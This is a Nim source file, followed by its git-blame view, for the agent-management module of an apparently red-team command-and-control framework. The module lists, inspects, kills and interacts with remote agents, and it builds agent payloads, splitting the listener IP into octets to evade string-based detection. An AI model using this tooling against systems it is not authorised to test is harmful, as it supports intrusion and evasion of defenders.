src/server/core/agent.nim

import terminal, strformat, strutils, tables, times, system, osproc, streams, base64

import ./task
import ../utils
import ../db/database
import ../../common/[types, utils]

# Utility functions
proc addMultiple*(cq: Conquest, agents: seq[Agent]) = 
    for a in agents: 
        cq.agents[a.agentId] = a

proc delAgent*(cq: Conquest, agentName: string) = 
    cq.agents.del(agentName)

proc getAgentsAsSeq*(cq: Conquest): seq[Agent] = 
    var agents: seq[Agent] = @[]
    for agent in cq.agents.values:
        agents.add(agent)
    return agents

#[
    Agent management
]# 
proc agentUsage*(cq: Conquest) = 
    cq.writeLine("""Manage, build and interact with agents.

Usage:
  agent [options] COMMAND

Commands:

  list             List all agents.
  info             Display details for a specific agent.
  kill             Terminate the connection of an active listener and remove it from the interface.
  interact         Interact with an active agent.

Options:
  -h, --help""")

# List agents
proc agentList*(cq: Conquest, listener: string) =

    # If no argument is passed via -n, list all agents, otherwise only display agents connected to a specific listener
    if listener == "": 
        cq.drawTable(cq.dbGetAllAgents())

    else: 
        # Check if listener exists
        if not cq.dbListenerExists(listener.toUpperAscii): 
            cq.writeLine(fgRed, styleBright, fmt"[-] Listener {listener.toUpperAscii} does not exist.")
            return

        cq.drawTable(cq.dbGetAllAgentsByListener(listener.toUpperAscii))


# Display agent properties and details
proc agentInfo*(cq: Conquest, name: string) = 
    # Check if agent supplied via -n parameter exists in database
    if not cq.dbAgentExists(name.toUpperAscii): 
        cq.writeLine(fgRed, styleBright, fmt"[-] Agent {name.toUpperAscii} does not exist.")
        return

    let agent = cq.agents[name.toUpperAscii]

    # TODO: Improve formatting
    cq.writeLine(fmt"""
Agent name (UUID):     {agent.agentId}
Connected to listener: {agent.listenerId}
──────────────────────────────────────────
Username:              {agent.username}
Hostname:              {agent.hostname}
Domain:                {agent.domain}
IP-Address:            {agent.ip}
Operating system:      {agent.os}
──────────────────────────────────────────
Process name:          {agent.process}
Process ID:            {$agent.pid}
Process elevated:      {$agent.elevated}
First checkin:         {agent.firstCheckin.format("dd-MM-yyyy HH:mm:ss")}
Latest checkin:        {agent.latestCheckin.format("dd-MM-yyyy HH:mm:ss")}
""")

# Terminate agent and remove it from the database
proc agentKill*(cq: Conquest, name: string) =

    # Check if agent supplied via -n parameter exists in database
    if not cq.dbAgentExists(name.toUpperAscii): 
        cq.writeLine(fgRed, styleBright, fmt"[-] Agent {name.toUpperAscii} does not exist.")
        return

    # TODO: Stop the process of the agent on the target system
    # TODO: Add flag to self-delete executable after killing agent


    # Remove the agent from the database
    if not cq.dbDeleteAgentByName(name.toUpperAscii): 
        cq.writeLine(fgRed, styleBright, "[-] Failed to terminate agent: ", getCurrentExceptionMsg())
        return

    cq.delAgent(name)
    cq.writeLine(fgYellow, styleBright, "[+] ", resetStyle, "Terminated agent ", fgYellow, styleBright, name.toUpperAscii, resetStyle, ".")

# Switch to interact mode
proc agentInteract*(cq: Conquest, name: string) = 

    # Verify that agent exists
    if not cq.dbAgentExists(name.toUpperAscii): 
        cq.writeLine(fgRed, styleBright, fmt"[-] Agent {name.toUpperAscii} does not exist.")
        return

    let agent = cq.agents[name.toUpperAscii]
    var command: string = ""

    # Change prompt indicator to show agent interaction
    cq.setIndicator(fmt"[{agent.agentId}]> ")
    cq.setStatusBar(@[("[mode]", "interact"), ("[username]", fmt"{agent.username}"), ("[hostname]", fmt"{agent.hostname}"), ("[ip]", fmt"{agent.ip}"), ("[domain]", fmt"{agent.domain}")])    
    cq.writeLine(fgYellow, styleBright, "[+] ", resetStyle, fmt"Started interacting with agent ", fgYellow, styleBright, agent.agentId, resetStyle, ". Type 'help' to list available commands.\n")
    cq.interactAgent = agent

    while command.replace(" ", "") != "back": 
        command = cq.readLine()
        cq.withOutput(handleAgentCommand, command)

    cq.interactAgent = nil 

# Agent generation 
proc agentBuild*(cq: Conquest, listener, sleep, payload: string) =

    # Verify that listener exists
    if not cq.dbListenerExists(listener.toUpperAscii): 
        cq.writeLine(fgRed, styleBright, fmt"[-] Listener {listener.toUpperAscii} does not exist.")
        return

    let listener = cq.listeners[listener.toUpperAscii] 

    # Create/overwrite nim.cfg file to set agent configuration 
    let agentConfigFile = fmt"../src/agent/nim.cfg"   

    # Parse IP Address and store as compile-time integer to hide hardcoded-strings in binary from `strings` command
    let (first, second, third, fourth) = parseOctets(listener.address)

    # Covert the servers's public X25519 key to as base64 string 
    let publicKey = encode(cq.keyPair.publicKey)

    # The following shows the format of the agent configuration file that defines compile-time variables 
    let config = fmt"""
    # Agent configuration 
    -d:ListenerUuid="{listener.listenerId}"
    -d:Octet1="{first}"
    -d:Octet2="{second}"
    -d:Octet3="{third}"
    -d:Octet4="{fourth}"
    -d:ListenerPort={listener.port}
    -d:SleepDelay={sleep}
    -d:ServerPublicKey="{publicKey}"
    """.replace("    ", "")
    writeFile(agentConfigFile, config)

    cq.writeLine(fgBlack, styleBright, "[*] ", resetStyle, "Configuration file created.")

    # Build agent by executing the ./build.sh script on the system.
    let agentBuildScript = fmt"../src/agent/build.sh"    

    cq.writeLine(fgBlack, styleBright, "[*] ", resetStyle, "Building agent...")
    
    try:
        # Using the startProcess function from the 'osproc' module, it is possible to retrieve the output as it is received, line-by-line instead of all at once
        let process = startProcess(agentBuildScript, options={poUsePath, poStdErrToStdOut})
        let outputStream = process.outputStream

        var line: string
        while outputStream.readLine(line):
            cq.writeLine(line) 

        let exitCode = process.waitForExit()

        # Check if the build succeeded or not
        if exitCode == 0:
            cq.writeLine(fgGreen, "[+] ", resetStyle, "Agent payload generated successfully.")
        else:
            cq.writeLine(fgRed, styleBright, "[-] ", resetStyle, "Build script exited with code ", $exitCode)

    except CatchableError as err:
        cq.writeLine(fgRed, styleBright, "[-] ", resetStyle, "An error occurred: ", err.msg)
Implemented ECDH key exchange using ed25519 to share a symmetric AES key without transmitting it over the network. 2025-07-24 15:31:46 +02:00			`import terminal, strformat, strutils, tables, times, system, osproc, streams, base64`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Cleaned up parts of the serialization by removing redundant code. 2025-07-28 21:29:47 +02:00			`import ./task`
Updated directory structure. 2025-07-15 23:26:54 +02:00			`import ../utils`
			`import ../db/database`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`import ../../common/[types, utils]`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Cleanup types.nim to only contain type definitions. 2025-07-16 14:45:45 +02:00			`# Utility functions`
			`proc addMultiple*(cq: Conquest, agents: seq[Agent]) =`
			`for a in agents:`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`cq.agents[a.agentId] = a`
Cleanup types.nim to only contain type definitions. 2025-07-16 14:45:45 +02:00
			`proc delAgent*(cq: Conquest, agentName: string) =`
			`cq.agents.del(agentName)`

			`proc getAgentsAsSeq*(cq: Conquest): seq[Agent] =`
			`var agents: seq[Agent] = @[]`
			`for agent in cq.agents.values:`
			`agents.add(agent)`
			`return agents`

			`#[`
			`Agent management`
			`]#`
Started work on agent registration 2025-05-12 21:53:37 +02:00			`proc agentUsage*(cq: Conquest) =`
			`cq.writeLine("""Manage, build and interact with agents.`

			`Usage:`
			`agent [options] COMMAND`

			`Commands:`

			`list List all agents.`
Implemented listing agents by listener UUID 2025-05-15 14:27:45 +02:00			`info Display details for a specific agent.`
Implemented agent removal, changed object structures 2025-05-14 15:48:01 +02:00			`kill Terminate the connection of an active listener and remove it from the interface.`
Started work on agent registration 2025-05-12 21:53:37 +02:00			`interact Interact with an active agent.`

			`Options:`
			`-h, --help""")`

Implemented agent removal, changed object structures 2025-05-14 15:48:01 +02:00			`# List agents`
Implemented listing agents by listener UUID 2025-05-15 14:27:45 +02:00			`proc agentList*(cq: Conquest, listener: string) =`

Added number of agents to listener list 2025-05-15 15:24:46 +02:00			`# If no argument is passed via -n, list all agents, otherwise only display agents connected to a specific listener`
			`if listener == "":`
			`cq.drawTable(cq.dbGetAllAgents())`
Prevent database locking by not updating latest checkin in database and instead storing it only in memory 2025-05-29 14:19:55 +02:00
Added number of agents to listener list 2025-05-15 15:24:46 +02:00			`else:`
			`# Check if listener exists`
			`if not cq.dbListenerExists(listener.toUpperAscii):`
			`cq.writeLine(fgRed, styleBright, fmt"[-] Listener {listener.toUpperAscii} does not exist.")`
			`return`
Implemented listing agents by listener UUID 2025-05-15 14:27:45 +02:00
Added number of agents to listener list 2025-05-15 15:24:46 +02:00			`cq.drawTable(cq.dbGetAllAgentsByListener(listener.toUpperAscii))`
Implemented listing agents by listener UUID 2025-05-15 14:27:45 +02:00
Prevent database locking by not updating latest checkin in database and instead storing it only in memory 2025-05-29 14:19:55 +02:00
Implemented listing agents by listener UUID 2025-05-15 14:27:45 +02:00			`# Display agent properties and details`
			`proc agentInfo*(cq: Conquest, name: string) =`
			`# Check if agent supplied via -n parameter exists in database`
			`if not cq.dbAgentExists(name.toUpperAscii):`
			`cq.writeLine(fgRed, styleBright, fmt"[-] Agent {name.toUpperAscii} does not exist.")`
			`return`

			`let agent = cq.agents[name.toUpperAscii]`

Added number of agents to listener list 2025-05-15 15:24:46 +02:00			`# TODO: Improve formatting`
Implemented listing agents by listener UUID 2025-05-15 14:27:45 +02:00			`cq.writeLine(fmt"""`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`Agent name (UUID): {agent.agentId}`
			`Connected to listener: {agent.listenerId}`
Implemented listing agents by listener UUID 2025-05-15 14:27:45 +02:00			`──────────────────────────────────────────`
			`Username: {agent.username}`
			`Hostname: {agent.hostname}`
			`Domain: {agent.domain}`
			`IP-Address: {agent.ip}`
			`Operating system: {agent.os}`
			`──────────────────────────────────────────`
			`Process name: {agent.process}`
			`Process ID: {$agent.pid}`
			`Process elevated: {$agent.elevated}`
Implemented displaying latest checkin in agents table, as well as word-wrap. 2025-05-23 13:55:00 +02:00			`First checkin: {agent.firstCheckin.format("dd-MM-yyyy HH:mm:ss")}`
			`Latest checkin: {agent.latestCheckin.format("dd-MM-yyyy HH:mm:ss")}`
			`""")`
Implemented listing agents by listener UUID 2025-05-15 14:27:45 +02:00
Implemented agent removal, changed object structures 2025-05-14 15:48:01 +02:00			`# Terminate agent and remove it from the database`
			`proc agentKill*(cq: Conquest, name: string) =`

			`# Check if agent supplied via -n parameter exists in database`
			`if not cq.dbAgentExists(name.toUpperAscii):`
			`cq.writeLine(fgRed, styleBright, fmt"[-] Agent {name.toUpperAscii} does not exist.")`
			`return`

			`# TODO: Stop the process of the agent on the target system`
			`# TODO: Add flag to self-delete executable after killing agent`


			`# Remove the agent from the database`
			`if not cq.dbDeleteAgentByName(name.toUpperAscii):`
			`cq.writeLine(fgRed, styleBright, "[-] Failed to terminate agent: ", getCurrentExceptionMsg())`
			`return`

			`cq.delAgent(name)`
			`cq.writeLine(fgYellow, styleBright, "[+] ", resetStyle, "Terminated agent ", fgYellow, styleBright, name.toUpperAscii, resetStyle, ".")`
Started work on agent registration 2025-05-12 21:53:37 +02:00
			`# Switch to interact mode`
Implemented switch to agent interaction mode. 2025-05-18 12:51:26 +02:00			`proc agentInteract*(cq: Conquest, name: string) =`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Implemented switch to agent interaction mode. 2025-05-18 12:51:26 +02:00			`# Verify that agent exists`
			`if not cq.dbAgentExists(name.toUpperAscii):`
			`cq.writeLine(fgRed, styleBright, fmt"[-] Agent {name.toUpperAscii} does not exist.")`
			`return`

			`let agent = cq.agents[name.toUpperAscii]`
			`var command: string = ""`

			`# Change prompt indicator to show agent interaction`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`cq.setIndicator(fmt"[{agent.agentId}]> ")`
Implemented switch to agent interaction mode. 2025-05-18 12:51:26 +02:00			`cq.setStatusBar(@[("[mode]", "interact"), ("[username]", fmt"{agent.username}"), ("[hostname]", fmt"{agent.hostname}"), ("[ip]", fmt"{agent.ip}"), ("[domain]", fmt"{agent.domain}")])`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`cq.writeLine(fgYellow, styleBright, "[+] ", resetStyle, fmt"Started interacting with agent ", fgYellow, styleBright, agent.agentId, resetStyle, ". Type 'help' to list available commands.\n")`
Implemented switch to agent interaction mode. 2025-05-18 12:51:26 +02:00			`cq.interactAgent = agent`

Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`while command.replace(" ", "") != "back":`
Implemented switch to agent interaction mode. 2025-05-18 12:51:26 +02:00			`command = cq.readLine()`
			`cq.withOutput(handleAgentCommand, command)`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Implemented switch to agent interaction mode. 2025-05-18 12:51:26 +02:00			`cq.interactAgent = nil`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Implemented agent generation from teamserver 2025-05-24 16:15:41 +02:00			`# Agent generation`
			`proc agentBuild*(cq: Conquest, listener, sleep, payload: string) =`

			`# Verify that listener exists`
			`if not cq.dbListenerExists(listener.toUpperAscii):`
			`cq.writeLine(fgRed, styleBright, fmt"[-] Listener {listener.toUpperAscii} does not exist.")`
			`return`

			`let listener = cq.listeners[listener.toUpperAscii]`

			`# Create/overwrite nim.cfg file to set agent configuration`
Rework module system. Now modules/commands are defined in a single file each, with both the function executed by teh agent and the definition for server-side argument parsing. 2025-07-25 16:41:29 +02:00			`let agentConfigFile = fmt"../src/agent/nim.cfg"`
Hide hardcoded IP address from agent binary by splitting it up into integer octets 2025-06-02 21:37:58 +02:00
			# Parse IP Address and store as compile-time integer to hide hardcoded-strings in binary from `strings` command
			`let (first, second, third, fourth) = parseOctets(listener.address)`
Implemented agent generation from teamserver 2025-05-24 16:15:41 +02:00
Implemented ECDH key exchange using ed25519 to share a symmetric AES key without transmitting it over the network. 2025-07-24 15:31:46 +02:00			`# Covert the servers's public X25519 key to as base64 string`
			`let publicKey = encode(cq.keyPair.publicKey)`

Implemented agent generation from teamserver 2025-05-24 16:15:41 +02:00			`# The following shows the format of the agent configuration file that defines compile-time variables`
			`let config = fmt"""`
			`# Agent configuration`
Changed variable names for clearer structure. 2025-07-22 21:31:18 +02:00			`-d:ListenerUuid="{listener.listenerId}"`
Hide hardcoded IP address from agent binary by splitting it up into integer octets 2025-06-02 21:37:58 +02:00			`-d:Octet1="{first}"`
			`-d:Octet2="{second}"`
			`-d:Octet3="{third}"`
			`-d:Octet4="{fourth}"`
Implemented agent generation from teamserver 2025-05-24 16:15:41 +02:00			`-d:ListenerPort={listener.port}`
			`-d:SleepDelay={sleep}`
Implemented ECDH key exchange using ed25519 to share a symmetric AES key without transmitting it over the network. 2025-07-24 15:31:46 +02:00			`-d:ServerPublicKey="{publicKey}"`
Implemented agent generation from teamserver 2025-05-24 16:15:41 +02:00			`""".replace(" ", "")`
			`writeFile(agentConfigFile, config)`

			`cq.writeLine(fgBlack, styleBright, "[*] ", resetStyle, "Configuration file created.")`

			`# Build agent by executing the ./build.sh script on the system.`
Rework module system. Now modules/commands are defined in a single file each, with both the function executed by teh agent and the definition for server-side argument parsing. 2025-07-25 16:41:29 +02:00			`let agentBuildScript = fmt"../src/agent/build.sh"`
Implemented agent generation from teamserver 2025-05-24 16:15:41 +02:00
			`cq.writeLine(fgBlack, styleBright, "[*] ", resetStyle, "Building agent...")`

			`try:`
			`# Using the startProcess function from the 'osproc' module, it is possible to retrieve the output as it is received, line-by-line instead of all at once`
			`let process = startProcess(agentBuildScript, options={poUsePath, poStdErrToStdOut})`
			`let outputStream = process.outputStream`

			`var line: string`
			`while outputStream.readLine(line):`
			`cq.writeLine(line)`

			`let exitCode = process.waitForExit()`

			`# Check if the build succeeded or not`
			`if exitCode == 0:`
			`cq.writeLine(fgGreen, "[+] ", resetStyle, "Agent payload generated successfully.")`
			`else:`
			`cq.writeLine(fgRed, styleBright, "[-] ", resetStyle, "Build script exited with code ", $exitCode)`

			`except CatchableError as err:`
			`cq.writeLine(fgRed, styleBright, "[-] ", resetStyle, "An error occurred: ", err.msg)`